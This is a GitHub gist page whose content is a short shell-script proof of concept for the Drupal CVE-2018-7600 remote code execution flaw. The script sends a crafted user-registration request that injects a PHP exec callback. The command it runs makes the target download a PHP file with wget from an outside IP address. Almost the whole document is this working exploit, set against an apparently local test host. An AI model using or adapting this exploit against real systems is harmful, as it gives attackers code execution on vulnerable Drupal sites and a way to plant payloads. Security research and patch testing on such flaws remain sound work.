Instantly share code, notes, and snippets.

Embed
What would you like to do?
Drupal CVE-2018-7600 PoC
#!/bin/sh
# https://github.com/a2u/CVE-2018-7600/issues/2
HOST="http://drupal.docker.localhost:8000"
PHP_FUNCTION="exec"
PHP_ARG="wget http://172.16.30.108:6969/foob.php"
curl -X POST \
"$HOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" \
-F form_id=user_register_form \
-F _drupal_ajax=1 \
-F "mail[#post_render][]=$PHP_FUNCTION" \
-F 'mail[#type]=markup' \
-F "mail[#markup]=$PHP_ARG"
@AlbinoDrought

This comment has been minimized.

Show comment
Hide comment
Owner

AlbinoDrought commented Apr 12, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment